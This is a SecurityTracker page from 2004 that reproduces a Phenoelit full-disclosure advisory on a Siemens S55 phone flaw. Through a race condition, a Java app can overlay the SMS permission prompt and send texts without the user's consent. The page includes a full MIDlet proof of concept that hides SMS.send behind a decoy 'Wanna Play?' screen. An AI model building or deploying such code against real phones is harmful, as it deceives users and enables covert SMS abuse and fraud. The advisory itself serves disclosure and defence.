Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Siemens S55 Phone Lets Remote Users Send Unauthorized SMS Messages
|
|
SecurityTracker Alert ID: 1009959
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Apr 27 2004
|
Impact: Modification of user information
|
Exploit Included: Yes
|
Advisory: Phenoelit Group
|
Version(s): S55, possibly others
|
Description: A vulnerability was reported in the Siemens S55 phone. A remote user can cause a target user's phone to send out SMS messages.
FtR and FX of Phenoelit Group reported that a remote user can create Java code that, when loaded by the target user, will send an
SMS message from the target user's system without asking for permission. This is due to a race condition during which the Java
code can overlay the normal permission request with an arbitrary screen display, the report said.
A demonstration exploit example
is provided in the Source Message.
The vendor was reportedly notified on November 9, 2003.
|
Impact: A remote user can create Java code that, when loaded by the target user, will send out an SMS message without the target user's permission.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.siemens.com/ (Links to External Site)
|
Cause: Access control error, State error
|
Reported By: ftr <ftr@phenoelit.de>
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 27 Apr 2004 17:47:07 +0200
From: ftr <ftr@phenoelit.de>
Subject: [Full-Disclosure] Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 ++++>
|
Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 ++++>
[ Authors ]
FtR <ftr@phenoelit.de>
FX <fx@phenoelit.de>
Phenoelit Group (http://www.phenoelit.de)
[ Affected Products ]
Siemens S55
Possibly others
Siemens : Not assigned
[ Vendor communication ]
09/Nov/03 Initial Notification, support@siemens.de
*Note-Initial notification by phenoelit
includes a cc to cert@cert.org by default
[ Overview ]
The Siemens S55 is a cellphone and provides a Java virtual machine
including a full featured API for additional software development
by third parties.
[ Description ]
The Java API provides the possibilty to send out SMS messages through
the Java Applications. This interface will ask for permissions to send
out the SMS by presenting a message screen.
The API also provides objects which alow a programmer to create
personal screen layouts for his applications
The vulnerability found can be described as a race condition
which allows the programmer to overlay the message which asks for
permission by his own screen craft.
The result of that vulnerability will allow any program to
send SMS to any number without notification to the user
[ Example ]
package hello;
import javax.microedition.lcdui.*;
import javax.microedition.midlet.*;
import com.siemens.mp.game.Sound;
import com.siemens.mp.gsm.*;
import java.lang.*;
import java.io.*;
public class hello extends MIDlet implements CommandListener
{
static final String EXIT_COMMAND_LABEL = "Exit FtRs world";
Display display;
static hello hello;
public void startApp (){
HelloCanva kanvas = new HelloCanva();
Scr2 scr2 = new Scr2();
display = Display.getDisplay(this);
// Menu
Command exitCommand = new Command(EXIT_COMMAND_LABEL , Command.SCREEN, 0);
scr2.addCommand(exitCommand);
scr2.setCommandListener(this);
//Data
// screen 1
display.setCurrent(kanvas);
mycall();
// screen 2
display.setCurrent(scr2);
//destroyApp(false);
}
public void mycall(){
String SMSstr= "Test";
try {
/* Send SMS VALIAD NUMEBER SHALL BE IN SERTED HERE*/
SMS.send("0170-Numder", SMSstr);
}
/* Exception handling */
catch (com.siemens.mp.NotAllowedException ex) {
// Some handling code ...
}
catch (IOException ex) {
//Some handling code ...
}
catch (IllegalArgumentException ex) {
// Some handling code ...
}
} //public viod call()
protected void destroyApp (boolean b){
display.setCurrent(null);
this.notifyDestroyed(); // notify KVM
}
protected void pauseApp ()
{ }
public void commandAction (Command c, Displayable d){
destroyApp(false);
}
}
class HelloCanva extends Canvas
{
public void paint (Graphics g)
{
String str = new String("Wanna Play?");
g.setColor(0,0,0);
g.fillRect(0, 0, getWidth(), getHeight());
g.setColor(255,0,0);
g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER | Graphics.BASELINE);
g.drawString("yes", (getWidth()/2)-35,(getHeight()/2)+35, Graphics.HCENTER
| Graphics.BASELINE);
g.drawString("no", (getWidth()/2)+35,(getHeight()/2)+35, Graphics.HCENTER |
Graphics.BASELINE);
}
}
class Scr2 extends Canvas
{
public void paint (Graphics g) {
String str = new String("cool");
g.setColor(0,0,0);
g.fillRect(0, 0, getWidth(), getHeight());
g.setColor(255,0,0);
g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER | Graphics.BASELINE);
}
}
[ Solution ]
None known at this time.
[ end of file ]
--
#!/usr/local/bin/perl
print&f(($_=(3x3)."3+33")=~s=3(?![^3]|$)=&f=eg);
sub f{eval(@_?$_:"'$&+'x3");}
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
|
|
Go to the Top of This SecurityTracker Archive Page
|
